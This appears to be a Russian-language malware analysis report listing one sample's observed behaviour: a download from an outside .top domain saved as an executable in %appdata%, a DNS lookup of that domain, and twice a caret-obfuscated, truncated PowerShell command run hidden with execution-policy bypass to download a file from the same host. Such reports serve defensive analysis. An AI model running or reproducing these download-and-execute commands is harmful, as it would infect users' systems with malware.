Техническая информация
- http://www.fapoergol.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pOW^E^RS^HE^ll.e^X^E -ExECUt^io^Np^O^L^Icy ^b^Yp^ass^ -NOpR^O^fILe^ -wIn^D^OWs^tylE hiD^dE^N^ (n^e^w^-O^bj^ec^T ^Sy^STeM.^n^eT.^webcl^IENT)^.D^OWnLO^aDfil^E('http://www.fapoerg...
- DNS ASK fa###rgol.top
- '<SYSTEM32>\cmd.exe' /c "pOW^E^RS^HE^ll.e^X^E -ExECUt^io^Np^O^L^Icy ^b^Yp^ass^ -NOpR^O^fILe^ -wIn^D^OWs^tylE hiD^dE^N^ (n^e^w^-O^bj^ec^T ^Sy^STeM.^n^eT.^webcl^IENT)^.D^OWnLO^aDfil^E('http://www.fapoerg...' (со скрытым окном)